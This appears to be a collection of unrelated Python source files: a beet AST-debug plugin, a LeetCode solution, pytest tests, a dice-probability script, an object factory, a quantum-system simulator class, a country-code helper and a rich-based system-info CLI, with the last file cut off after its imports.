@configurable(validator=DebugAstOptions)
def debug_ast(ctx: Context, opts: DebugAstOptions):
mc = ctx.inject(Mecha)
mc.steps[:] = [DebugAstEmitter(location=opts.location, database=mc.database)]
@dataclass
class DebugAstEmitter(Visitor):
"""Visitor that interrupts the compilation process and dumps the current ast."""
location: bool = False
database: CompilationDatabase = required_field()
@rule(AstRoot)
def debug_ast(self, node: AstRoot):
exclude = None if self.location else {"location", "end_location"}
self.database.current.text = node.dump(exclude=exclude) + "\n"
return None
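# A hypothetical beet project config that would enable this plugin (the
# layout and module path below are assumptions, not taken from this file):
#   # beet.yml
#   pipeline:
#     - my_plugins.debug_ast   # wherever this module is importable from
#   meta:
#     debug_ast:
#       location: true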
|
python
|
#!/usr/bin/env python
"""
CREATED AT: 2021/9/14
Des:
https://leetcode.com/problems/reverse-only-letters
https://leetcode.com/explore/item/3974
GITHUB: https://github.com/Jiezhi/myleetcode
Difficulty: Easy
"""
from tool import print_results
class Solution:
@print_results
def reverseOnlyLetters(self, s: str) -> str:
"""
115 / 115 test cases passed.
Status: Accepted
Runtime: 73 ms
Memory Usage: 14.1 MB
:param s:
:return:
"""
s = list(s)
i, j = 0, len(s) - 1
while i < j:
while not s[i].isalpha() and i < j:
i += 1
while not s[j].isalpha() and i < j:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
def test():
assert Solution().reverseOnlyLetters(s="ab-cd") == "dc-ba"
assert Solution().reverseOnlyLetters(s="a-bC-dEf-ghIj") == "j-Ih-gfE-dCba"
assert Solution().reverseOnlyLetters(s="Test1ng-Leet=code-Q!") == "Qedo1ct-eeLg=ntse-T!"
if __name__ == '__main__':
test()
|
python
|
import pytest
# Local Functions
from fexception.util import set_caller_override
# Local Methods
from fexception.util import KeyCheck
__author__ = 'IncognitoCoding'
__copyright__ = 'Copyright 2022, test_util'
__credits__ = ['IncognitoCoding']
__license__ = 'MIT'
__version__ = '0.0.2'
__maintainer__ = 'IncognitoCoding'
__status__ = 'Beta'
# ############################################################
# ######Section Test Part 1 (Successful Value Checking)#######
# ############################################################
def test_1_set_caller_override():
"""
    Tests setting a caller_override with the module name.
"""
caller_override = set_caller_override(tb_remove_name='test_1_set_caller_override')
assert 'python' == str(caller_override.get('module'))
assert 'pytest_pyfunc_call' == str(caller_override.get('name'))
# This line number can change if pytest updates code.
assert 183 == int(caller_override.get('line'))
assert 'test_1_set_caller_override' == str(caller_override.get('tb_remove'))
def test_1_keycheck() -> None:
"""
Tests key check success.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key3'])
def test_1_2_keycheck() -> None:
"""
Tests key check success.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key1'])
def test_1_3_keycheck() -> None:
"""
Tests key check success in reverse.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key3'])
def test_1_4_keycheck() -> None:
"""
Tests key check success in reverse.
"""
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key1'], reverse_output=True)
# ############################################################
# ######Section Test Part 2 (Error/Catch Value Checking)######
# ############################################################
def test_2_set_caller_override():
"""
Tests a non-matching tb_remove name.
"""
with pytest.raises(Exception) as excinfo:
set_caller_override(tb_remove_name='invalid_name')
assert ('The function or method name did not match any co_name '
'in the inspect.currentframe()') in str(excinfo.value)
assert """'invalid_name' matching co_name""" in str(excinfo.value)
def test_2_keycheck():
"""
Tests missing key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['Yellow', 'Blue'])
assert 'The input keys have inconsistent value and requirement keys.' in str(excinfo.value)
def test_2_1_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue', 'Blue'])
assert 'The required key list contains duplicate keys. All keys must be unique.' in str(excinfo.value)
def test_2_2_keycheck():
"""
Tests incorrect type input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys={'Bad Type'})
assert """The dictionary key ('{'Bad Type'}') does not match any expected match option key(s).""" in str(excinfo.value)
assert """Match Option Key(s) = {'Bad Type'}""" in str(excinfo.value)
assert """Failed Key(s) = ['Green', 'Blue']""" in str(excinfo.value)
def test_2_3_reverse_keycheck():
"""
Tests duplicate key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue', 'Blue'], reverse_output=True)
assert 'The required key list contains duplicate keys. All keys must be unique.' in str(excinfo.value)
def test_2_4_reverse_keycheck():
"""
    Tests empty required-key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=[], reverse_output=True)
assert 'No key(s) were sent' in str(excinfo.value)
assert """Expected Key(s) = ['Green', 'Blue', 'Red']""" in str(excinfo.value)
def test_2_5_reverse_keycheck():
"""
    Tests inconsistent required-key input issues.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Red': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys='Red', reverse_output=True)
assert 'The input keys have inconsistent value and requirement keys.' in str(excinfo.value)
assert """Required Key(s) = ['Green', 'Blue', 'Red']""" in str(excinfo.value)
def test_2_6_keycheck() -> None:
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'])
assert """The dictionary key ('key2') does not exist in the expected required key(s).""" in str(excinfo.value)
assert """Expected Key(s) = ['key1', 'key2']""" in str(excinfo.value)
assert """Failed Key(s) = ['key1', 'key3']""" in str(excinfo.value)
def test_2_7_keycheck() -> None:
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key2': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['key5'])
assert """Match Option Key(s) = ['key5']""" in str(excinfo.value)
def test_2_8_keycheck():
"""
Tests key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'])
assert """Expected Key(s) = ['key1', 'key2']""" in str(excinfo.value)
def test_2_9_reverse_keycheck():
"""
Tests reverse key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'key1': 'value1', 'key3': 'value2'},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.all_keys(required_keys=['key1', 'key2'], reverse_output=True)
assert """Expected Key(s) = ['key1', 'key3']""" in str(excinfo.value)
def test_2_10_reverse_keycheck():
"""
Tests reverse key check validation failure.
"""
with pytest.raises(Exception) as excinfo:
key_check = KeyCheck(values={'Green': None, 'Blue': None, 'Green': None},
caller_module='sample_module',
caller_name='sample_name',
caller_line='sample_line')
key_check.contains_keys(required_keys=['Yellow', 'Blue'], reverse_output=True)
assert """Match Option Key(s) = ['Green', 'Blue']""" in str(excinfo.value)
|
python
|
from math import sqrt
class SomeClass:
'''Some class that certainly does things.
Args:
foo (str): Some string.
'''
def __init__(self, foo: str = 'foo'):
self.msg = f'Here comes {foo}!'
def is_msg_large(self, msg: str):
msg_size = len(msg)
is_large = msg_size > 256
if is_large:
print('This message is too large!')
return is_large
bar = SomeClass('foo')
largeness = bar.is_msg_large(bar.msg)
|
python
|
from fractions import Fraction
def roll(dices, times):
counter = {}
for d in dices:
counter[d] = 1
for t in range(1, times):
acc = {}
for k, v in counter.items():
for d in dices:
acc[k + d] = acc.get(k + d, 0) + v
counter = acc
return counter
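# A small worked example of the recurrence above:
#   roll([1, 2], 2)  ->  {2: 1, 3: 2, 4: 1}
# i.e. the number of ways each sum can occur after two rolls.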
pyramidal = roll([1, 2, 3, 4], 9)
cubic = roll([1, 2, 3, 4, 5, 6], 6)
pyramidal_pr = {}
for k, v in pyramidal.items():
pyramidal_pr[k] = Fraction(v, 4 ** 9)
cubic_pr = {}
for k, v in cubic.items():
cubic_pr[k] = Fraction(v, 6 ** 6)
beats_pr = 0
for p, p_pr in pyramidal_pr.items():
for c, c_pr in cubic_pr.items():
if p > c:
beats_pr += p_pr * c_pr
print("%.7f" % float(beats_pr))
|
python
|
__author__ = 'faisal'
|
python
|
import os
import importlib
from functools import partial
KNOWN_MODULES = {
# datasets
'opencv_video_seq_dataset': 'hyperseg.datasets.opencv_video_seq_dataset',
'img_landmarks_transforms': 'hyperseg.datasets.img_landmarks_transforms',
'seg_transforms': 'hyperseg.datasets.seg_transforms',
'transforms': 'torchvision.transforms',
# models
'models': 'hyperseg.models',
'mobilenet': 'hyperseg.models.mobilenet',
'efficientnet': 'hyperseg.models.efficientnet',
'efficientnet_custom': 'hyperseg.models.efficientnet_custom',
'efficientnet_custom_03': 'hyperseg.models.efficientnet_custom_03',
# Layers
'weight_mapper': 'hyperseg.models.layers.weight_mapper',
'weight_mapper_unet': 'hyperseg.models.layers.weight_mapper_unet',
# Torch
'nn': 'torch.nn',
'optim': 'torch.optim',
'lr_scheduler': 'torch.optim.lr_scheduler',
}
def extract_args(*args, **kwargs):
return args, kwargs
def is_str_module(obj_exp):
    return isinstance(obj_exp, str) and ('.' in obj_exp or ('(' in obj_exp and ')' in obj_exp))
def obj_factory(obj_exp, *args, **kwargs):
""" Creates objects from strings or partial objects with additional provided arguments.
In case a sequence is provided, all objects in the sequence will be created recursively.
    Objects that are not strings or partials will be returned as they are.
Args:
        obj_exp (str or partial): The object string expression or partial to be converted into an object. Can also be
a sequence of object expressions
*args: Additional arguments to pass to the object
**kwargs: Additional keyword arguments to pass to the object
Returns:
object or object list: Created object or list of recursively created objects
"""
if isinstance(obj_exp, (list, tuple)):
return [obj_factory(o, *args, **kwargs) for o in obj_exp]
if isinstance(obj_exp, partial):
return obj_exp(*args, **kwargs)
if not isinstance(obj_exp, str):
return obj_exp
# Handle arguments
if '(' in obj_exp and ')' in obj_exp:
args_exp = obj_exp[obj_exp.find('('):]
obj_args, obj_kwargs = eval('extract_args' + args_exp)
# # Recursively evaluate string modules
# obj_args = tuple([obj_factory(o) if is_str_module(o) else o for o in obj_args])
# obj_kwargs = {k: obj_factory(v) if is_str_module(v) else v for k, v in obj_kwargs.items()}
# Concatenate arguments
args = obj_args + args
kwargs.update(obj_kwargs)
obj_exp = obj_exp[:obj_exp.find('(')]
# From here we can assume that dots in the remaining of the expression
# only separate between modules and classes
module_name, class_name = os.path.splitext(obj_exp)
class_name = class_name[1:]
module = importlib.import_module(KNOWN_MODULES[module_name] if module_name in KNOWN_MODULES else module_name)
module_class = getattr(module, class_name)
class_instance = module_class(*args, **kwargs)
return class_instance
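# A minimal usage sketch (the expressions are illustrative; 'nn' and 'optim'
# resolve through KNOWN_MODULES to torch.nn and torch.optim):
#   obj_factory('nn.ReLU')                    -> torch.nn.ReLU()
#   obj_factory('optim.SGD(lr=0.1)', params)  -> torch.optim.SGD(params, lr=0.1)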
def partial_obj_factory(obj_exp, *args, **kwargs):
""" Creates objects from strings or partial objects with additional provided arguments.
In case a sequence is provided, all objects in the sequence will be created recursively.
    Objects that are not strings or partials will be returned as they are.
Args:
        obj_exp (str or partial): The object string expression or partial to be converted into an object. Can also be
a sequence of object expressions
*args: Additional arguments to pass to the object
**kwargs: Additional keyword arguments to pass to the object
Returns:
object or object list: Created object or list of recursively created objects
"""
if isinstance(obj_exp, (list, tuple)):
return [partial_obj_factory(o, *args, **kwargs) for o in obj_exp]
if isinstance(obj_exp, partial):
return partial(obj_exp.func, *(obj_exp.args + args), **{**obj_exp.keywords, **kwargs})
if not isinstance(obj_exp, str):
return partial(obj_exp)
# Handle arguments
if '(' in obj_exp and ')' in obj_exp:
args_exp = obj_exp[obj_exp.find('('):]
obj_args, obj_kwargs = eval('extract_args' + args_exp)
# Concatenate arguments
args = obj_args + args
kwargs.update(obj_kwargs)
obj_exp = obj_exp[:obj_exp.find('(')]
# From here we can assume that dots in the remaining of the expression
# only separate between modules and classes
module_name, class_name = os.path.splitext(obj_exp)
class_name = class_name[1:]
module = importlib.import_module(KNOWN_MODULES[module_name] if module_name in KNOWN_MODULES else module_name)
module_class = getattr(module, class_name)
return partial(module_class, *args, **kwargs)
def main(obj_exp):
# obj = obj_factory(obj_exp)
# print(obj)
import inspect
partial_obj = partial_obj_factory(obj_exp)
print(f'is obj_exp a class = {inspect.isclass(partial_obj.func)}')
print(partial_obj)
if __name__ == "__main__":
# Parse program arguments
import argparse
parser = argparse.ArgumentParser('utils test')
parser.add_argument('obj_exp', help='object string')
args = parser.parse_args()
main(args.obj_exp)
|
python
|
"""Module that provides a data structure representing a quantum system.
Data Structures:
QSystem: Quantum System, preferred over QRegistry (can save a lot of space)
Functions:
superposition: join two registries into one by calculating tensor product.
"""
import numpy as np
from qsimov.structures.qstructure import QStructure, _get_qubit_set, \
_get_op_data
from qsimov.structures.qregistry import QRegistry, superposition
class QSystem(QStructure):
"""Quantum System, preferred over QRegistry (can save a lot of space)."""
def __init__(self, num_qubits, doki=None, verbose=False):
"""Initialize QSystem to state 0.
num_qubits -> number of QuBits in the system.
"""
if doki is None:
import doki
self.doki = doki
if num_qubits is None:
self.regs = None
self.qubitMap = None
self.usable = None
self.num_qubits = 0
else:
self.regs = [[QRegistry(1, doki=self.doki), [id]]
for id in range(num_qubits)]
self.qubitMap = {id: id for id in range(num_qubits)}
self.usable = [True for id in range(num_qubits)]
self.num_qubits = num_qubits
self.verbose = verbose
def free(self):
"""Release memory held by the QSystem."""
if self.regs is not None:
for reg, _ in self.regs:
if isinstance(reg, QRegistry):
reg.free()
del self.regs
del self.qubitMap
del self.usable
self.regs = None
self.qubitMap = None
self.usable = None
def clone(self):
"""Clone this QSystem."""
new_sys = QSystem(None, doki=self.doki)
new_sys.num_qubits = self.num_qubits
new_sys.usable = self.usable[:]
new_sys.qubitMap = {}
for id in self.qubitMap:
new_sys.qubitMap[id] = self.qubitMap[id]
new_sys.regs = [[self.regs[id][0].clone(), self.regs[id][1][:]]
if isinstance(self.regs[id][0], QRegistry)
else [self.regs[id][0], self.regs[id][1][:]]
for id in range(new_sys.num_qubits)]
return new_sys
def __del__(self):
"""Clean after deletion."""
self.free()
def prob(self, id, num_threads=-1):
"""Get the odds of getting 1 when measuring specified qubit."""
id = _get_qubit_set(self.get_num_qubits(), [id], True, "argument")[0]
reg, ids = self.regs[self.qubitMap[id]]
if not self.usable[id]:
return reg
new_id = None
for i in range(len(ids)):
if ids[i] == id:
new_id = i
break
if new_id is None:
raise RuntimeError("Couldn't find id in any reg, " +
"please report this bug.")
return reg.prob(new_id, num_threads=num_threads)
def get_sizes(self):
"""Return the number of elements of each registry in the system."""
return ((reg[0].get_state_size(), reg[1])
if type(reg[0]) == QRegistry
else (1, reg[1])
for reg in self.regs)
def get_state_size(self):
"""Return the number of elements in the state vector of the system."""
total = 0
for reg in self.regs:
if type(reg[0]) == QRegistry:
total += reg[0].get_state_size()
else:
total += 1
return total
def get_split_num_qubits(self):
"""Return the number of qubits in each registry of the system."""
return (reg[0].get_num_qubits()
if type(reg[0]) == QRegistry
else 1 # When we measure with remove=True
for reg in self.regs)
def get_num_qubits(self):
"""Return the number of qubits in this system."""
return self.num_qubits
def measure(self, ids, random_generator=np.random.rand, num_threads=-1):
"""Measure specified qubits of this system and collapse.
Positional arguments:
ids -> List of QuBit ids that have to be measured
Keyworded arguments:
random_generator -> function without arguments that returns
a random real number in [0, 1)
Return:
List with the value obtained after each measure
"""
num_qubits = self.get_num_qubits()
ids = _get_qubit_set(num_qubits, ids, False, "ids")
if ids is None:
raise ValueError("ids cannot be None")
split_ids = {reg_id: set() for reg_id in range(len(self.regs))}
for qubit_id in ids:
if not self.usable[qubit_id]:
raise ValueError(f"Id {qubit_id} has already been measured")
reg_id = self.qubitMap[qubit_id]
split_ids[reg_id].add(qubit_id)
# In split ids we have reg_id -> set of ids to measure in that reg
split_ids = {k: v for k, v in split_ids.items() if len(v) > 0}
result = [None for i in range(num_qubits)]
# Here we have the registries that have not been used
untouched_regs = {i for i in range(len(self.regs))
if i not in split_ids}
# We create a new QSystem with the regs that have not been used
new_sys = QSystem(None, doki=self.doki)
new_sys.regs = []
exception = None
try:
for reg_id in untouched_regs:
reggie, reg_ids = self.regs[reg_id]
if isinstance(reggie, QRegistry):
reggie = reggie.clone()
new_sys.regs.append((reggie,
reg_ids[:]))
new_sys.qubitMap = {}
for reg_id in range(len(untouched_regs)):
for qubit_id in new_sys.regs[reg_id][1]:
new_sys.qubitMap[qubit_id] = reg_id
# print("[DEBUG]", ids)
new_sys.usable = [i not in ids and self.usable[i]
for i in range(self.num_qubits)]
# print("[DEBUG]", new_sys.usable)
new_sys.num_qubits = self.num_qubits
# We iterate through the registries that have a qubit in ids
for reg_id in split_ids:
partial_ids = split_ids[reg_id] # ids of QSystem to measure
new_reg = None
partial_result = None
reg, reg_ids = self.regs[reg_id]
# Ids to measure in the QRegistry (not in the whole QSystem)
# mapped to the id in the QSystem
new_ids = {i: reg_ids[i] for i in range(len(reg_ids))
if reg_ids[i] in partial_ids}
# Not measured ids of the QSystem belonging to this QRegistry
not_ids = [reg_ids[i] for i in range(len(reg_ids))
if reg_ids[i] not in partial_ids]
# We measure registries
if isinstance(reg, QRegistry):
aux = reg.measure(new_ids.keys(),
random_generator=random_generator,
num_threads=num_threads)
new_reg, partial_result = aux
new_reg.num_bits = 0
new_reg.qubit_map = {i: i
for i in range(new_reg.num_qubits)}
new_reg.classic_vals = {}
elif isinstance(reg, bool):
new_reg = None
partial_result = [reg]
else:
raise RuntimeError(f"Unknown reg type: {type(reg)}." +
" Please report this bug.")
# We add the results to the result list
for local_id in new_ids:
result[new_ids[local_id]] = partial_result[local_id]
# We add the new registry (if it exists) to the list of regs
if new_reg is not None:
new_sys.regs.append([new_reg, not_ids])
# We update the mapping
for qubit_id in not_ids:
new_sys.qubitMap[qubit_id] = len(new_sys.regs) - 1
# We add booleans
for qubit_id in partial_ids:
new_sys.regs.append([result[qubit_id], [qubit_id]])
new_sys.qubitMap[qubit_id] = len(new_sys.regs) - 1
except Exception as ex:
exception = ex
if exception is not None:
new_sys.free()
raise exception
return (new_sys, result)
def as_qregistry(self, num_threads=-1, canonical=True):
"""Return this system as a QRegistry."""
aux_reg = None
new_reg = None
new_ids = []
first = True
exception = None
reg_ids = []
for i in range(self.num_qubits):
if self.usable[i]:
reg_id = self.qubitMap[i]
if reg_id not in reg_ids:
reg_ids.append(reg_id)
try:
for reg_id in reg_ids[::-1]:
reg, ids = self.regs[reg_id]
if type(reg) == QRegistry:
if new_reg is None:
new_reg = reg
else:
aux_reg = superposition(new_reg, reg,
num_threads=num_threads,
verbose=self.verbose)
new_ids = ids + new_ids
if aux_reg is not None:
if not first:
new_reg.free()
first = False
new_reg = aux_reg
aux_reg = None
# Here we remove the unused ids
# print("[DEBUG] PreSort:", new_reg.get_state())
# print("[DEBUG] IDs:", new_ids)
swap_ids = np.argsort(np.argsort(new_ids))
# print("[DEBUG] SWAP IDs:", swap_ids)
# And we sort the remaining qubits by qubit_id
for i in range(len(swap_ids)):
while swap_ids[i] != i:
swap_targets = [swap_ids[i], swap_ids[swap_ids[i]]]
# print("[DEBUG] Looping:", swap_targets)
swap_ids[swap_targets[0]], swap_ids[i] = swap_targets
aux_reg = new_reg.apply_gate("SWAP",
targets=[i, swap_targets[0]],
num_threads=num_threads)
if not first:
new_reg.free()
new_reg = aux_reg
# print("[DEBUG] Sorted:", new_reg.get_state())
except Exception as ex:
exception = ex
if exception is not None:
if new_reg is not None:
new_reg.free()
if aux_reg is not None:
aux_reg.free()
raise exception
return new_reg
def get_state(self, key=None, canonical=False):
return self.as_qregistry().get_state(key=key, canonical=canonical)
def get_classic(self, id):
"""Return classic bit value (if qubit has been measured)."""
if self.usable[id]:
return None
return self.regs[self.qubitMap[id]][0]
def apply_gate(self, gate, targets=None, controls=None, anticontrols=None,
num_threads=-1):
"""Apply specified gate to specified qubit with specified controls.
Positional arguments:
gate: string with the name of the gate to apply, or a QGate
Keyworded arguments:
targets: id of the least significant qubit the gate will target
controls: id or list of ids of the qubit that will act as
controls
anticontrols: id or list of ids of the qubit that will act as
anticontrols
num_threads: number of threads to use
optimize: only for QGates. Whether to use optimized lines or
user defined lines
"""
if not np.allclose(num_threads % 1, 0):
raise ValueError("num_threads must be an integer")
num_threads = int(num_threads)
num_qubits = self.get_num_qubits()
op_data = _get_op_data(num_qubits, gate, targets,
controls, anticontrols)
gate = op_data["gate"]
targets = op_data["targets"]
controls = op_data["controls"]
anticontrols = op_data["anticontrols"]
# We create a new system without the data of the parties
new_sys = QSystem(None, doki=self.doki)
new_sys.regs = []
new_reg = None
aux_reg = None
exception = None
try:
# If any of the affected qubits is marked as not usable
if any([not self.usable[qubit_id]
for qubit_id in targets]):
# we raise an exception
raise ValueError("Trying to apply gate to classic bit")
classic_controls = {qubit_id for qubit_id in controls
if not self.usable[qubit_id]}
classic_anticontrols = {qubit_id for qubit_id in anticontrols
if not self.usable[qubit_id]}
ccheck = all(self.regs[self.qubitMap[id]][0]
for id in classic_controls)
accheck = any(self.regs[self.qubitMap[id]][0]
for id in classic_anticontrols)
            # skip the gate when a classic control reads 0 or a classic anticontrol reads 1
            if ((len(classic_controls) > 0 and not ccheck)
                    or (len(classic_anticontrols) > 0 and accheck)):
return self.clone()
controls -= classic_controls
anticontrols -= classic_anticontrols
# All affected qubits
parties = controls.union(anticontrols).union(targets)
touched_regs = {self.qubitMap[qubit_id]
for qubit_id in parties}
for reg_id in range(len(self.regs)):
if reg_id not in touched_regs:
reggie, reg_ideses = self.regs[reg_id]
if isinstance(reggie, QRegistry):
reggie = reggie.clone()
new_sys.regs.append([reggie, reg_ideses[:]])
# Create new qubit map
new_sys.qubitMap = {}
for reg_id in range(len(new_sys.regs)):
for qubit_id in new_sys.regs[reg_id][1]:
new_sys.qubitMap[qubit_id] = reg_id
new_sys.usable = self.usable[:]
new_sys.num_qubits = self.num_qubits
new_ids = []
merged = False
for reg_id in touched_regs:
curr_reg, curr_ids = self.regs[reg_id]
if new_reg is not None:
aux_reg = superposition(curr_reg, new_reg,
num_threads=num_threads,
verbose=self.verbose)
if merged:
new_reg.free()
del new_reg
else:
merged = True
new_reg = aux_reg
else:
new_reg = curr_reg
new_ids += curr_ids
inverse_map = {new_ids[qubit_id]: qubit_id
for qubit_id in range(len(new_ids))}
mapped_targets = [inverse_map[qubit_id]
for qubit_id in targets]
mapped_controls = {inverse_map[qubit_id]
for qubit_id in controls}
mapped_anticontrols = {inverse_map[qubit_id]
for qubit_id in anticontrols}
aux_reg = new_reg.apply_gate(gate, targets=mapped_targets,
controls=mapped_controls,
anticontrols=mapped_anticontrols,
num_threads=num_threads)
if merged:
new_reg.free()
new_reg = None
new_sys.regs.append([aux_reg, new_ids])
for id in new_ids:
new_sys.qubitMap[id] = len(new_sys.regs) - 1
except Exception as ex:
if new_sys is not None:
new_sys.free()
if new_reg is not None and merged:
new_reg.free()
if aux_reg is not None:
aux_reg.free()
new_sys = None
exception = ex
if exception is not None:
raise exception
return new_sys
def get_bloch_coords(self):
"""Get the polar coordinates of all ONE qubit registries."""
return [self.regs[self.qubitMap[id]][0].get_bloch_coords()
if (type(self.regs[self.qubitMap[id]][0]) == QRegistry
and len(self.regs[self.qubitMap[id]][1]) == 1)
else None
for id in range(self.num_qubits)]
def join_systems(most, least):
"""Return a system that contains both a and b systems."""
    res = QSystem(None, doki=most.doki)
    res.regs = []
    res.qubitMap = {}
    # usable is a per-qubit list of booleans, matching __init__
    res.usable = least.usable[:] + most.usable[:]
    res.num_qubits = least.get_num_qubits() + most.get_num_qubits()
    exception = None
    try:
        for reg, ids in least.regs:
            new_reg = reg
            if isinstance(reg, QRegistry):
                new_reg = reg.clone()
            res.regs.append([new_reg, ids[:]])
        offset = least.get_num_qubits()
        for reg, ids in most.regs:
            new_reg = reg
            if isinstance(reg, QRegistry):
                new_reg = reg.clone()
            res.regs.append([new_reg, [id + offset for id in ids]])
for i in range(len(res.regs)):
_, ids = res.regs[i]
for qubit_id in ids:
res.qubitMap[qubit_id] = i
except Exception as ex:
exception = ex
if exception is not None:
res.free()
raise exception
return res
|
python
|
from panoramic.cli.husky.service.select_builder.graph_search import (
sort_models_with_heuristic,
)
from panoramic.cli.husky.service.utils.taxon_slug_expression import TaxonSlugExpression
from tests.panoramic.cli.husky.test.mocks.husky_model import (
get_mock_entity_model,
get_mock_metric_model,
)
from tests.panoramic.cli.husky.test.test_base import BaseTest
class TestGraphSearch(BaseTest):
def test_company_scoped_models(self):
entity_model = get_mock_entity_model()
company_model = get_mock_metric_model(company_id='company-id')
models = [entity_model, company_model]
sorted_models = sort_models_with_heuristic(
models, {TaxonSlugExpression('ad_id'), TaxonSlugExpression('impressions')}
)
self.assertEqual(2, len(sorted_models))
self.assertEqual([company_model, entity_model], sorted_models)
|
python
|
import unittest
import_error = False
try:
from ...tables.base import Base
except ImportError:
import_error = True
Base = None
class TestCase00(unittest.TestCase):
def test_import(self):
self.assertFalse(import_error)
class TestCase01(unittest.TestCase):
def setUp(self):
self.base = Base()
def test_init(self):
pass
|
python
|
"""Utility functions."""
import pycountry
def eu_country_code_to_iso3(eu_country_code):
"""Converts EU country code to ISO 3166 alpha 3.
The European Union uses its own country codes, which often but not always match ISO 3166.
"""
assert len(eu_country_code) == 2, "EU country codes are of length 2, yours is '{}'.".format(eu_country_code)
if eu_country_code.lower() == "el":
iso2 = "gr"
elif eu_country_code.lower() == "uk":
iso2 = "gb"
elif eu_country_code.lower() == "bh": # this is a weird country code used in the biofuels dataset
iso2 = "ba"
else:
iso2 = eu_country_code
return pycountry.countries.lookup(iso2).alpha_3
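# A few illustrative conversions (following the special cases above):
#   eu_country_code_to_iso3("el")  ->  "GRC"   # Greece
#   eu_country_code_to_iso3("uk")  ->  "GBR"   # United Kingdom
#   eu_country_code_to_iso3("de")  ->  "DEU"   # Germany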
|
python
|
from info import *
from choice import *
from rich.console import Console
from rich.table import Table
import time
from rich import print
from rich.panel import Panel
from rich.progress import Progress
def banner():
print(r"""
_ ___ ____ ____ __ _ _
| | | \ \/ /\ \ / / \/ | __ _/ | / |
| |_| |\ / \ \ / /| |\/| | \ \ / / | | |
| _ |/ \ \ V / | | | | \ V /| |_| | - Check your host compatibility for VMs
|_| |_/_/\_\ \_/ |_| |_| \_/ |_(_)_|
""")
print(Panel("Copyright of Aman Srivastava, 2022\nhttps://amanonearth.github.io\nhttps://amanonearth.medium.com ", title="Welcome", subtitle="Thank you"))
def main():
homeopt = int(input("Please enter your option: "))
if homeopt == 1:
with Progress() as progress:
task01 = progress.add_task("[green]Gathering System Information...", total=100)
while not progress.finished:
progress.update(task01, advance=0.7)
time.sleep(0.02)
sysinfo()
if homeopt == 2:
with Progress() as progress:
task02 = progress.add_task("[green]Gathering CPU Information...", total=100)
while not progress.finished:
progress.update(task02, advance=0.9)
time.sleep(0.02)
cpuinfo()
if homeopt == 3:
with Progress() as progress:
task03 = progress.add_task("[green]Gathering RAM Information...", total=100)
while not progress.finished:
progress.update(task03, advance=0.6)
time.sleep(0.02)
raminfo()
if homeopt == 4:
with Progress() as progress:
task04 = progress.add_task("[green]Gathering Disk Information...", total=100)
while not progress.finished:
progress.update(task04, advance=0.5)
time.sleep(0.02)
diskinfo()
if homeopt == 5:
with Progress(transient=True) as progress:
task1 = progress.add_task("[green]Gathering System Information...", total=100)
task2 = progress.add_task("[green]Gathering CPU Information...", total=100)
task3 = progress.add_task("[green]Gathering RAM Information...", total=100)
task4 = progress.add_task("[green]Gathering Disk Information...", total=100)
while not progress.finished:
progress.update(task1, advance=0.7)
progress.update(task2, advance=0.9)
progress.update(task3, advance=0.6)
progress.update(task4, advance=0.5)
time.sleep(0.02)
allinfo()
if homeopt == 6:
choicepy()
    if homeopt < 1 or homeopt > 6:
        print(Panel.fit("[red]Your chosen option is not a valid input.\nPlease try again with a valid input."))
if __name__ == "__main__":
banner()
print("\n")
table = Table()
table.add_column("S. No.")
table.add_column("Option", style="green")
table.add_row("1", "Get your System Information")
table.add_row("2", "Get CPU Information")
table.add_row("3", "Get RAM Information")
table.add_row("4", "GET Disk Information")
table.add_row("5", "Get All information mentioned above")
table.add_row("6", "Check Virtual Machine Compatibility")
console = Console()
console.print(table)
main()
|
python
|
import os
import sys
from copy import deepcopy
from distutils.version import LooseVersion
import h5py
import numpy as np
import pytest
from ...util.functions import random_id
from ...model import Model
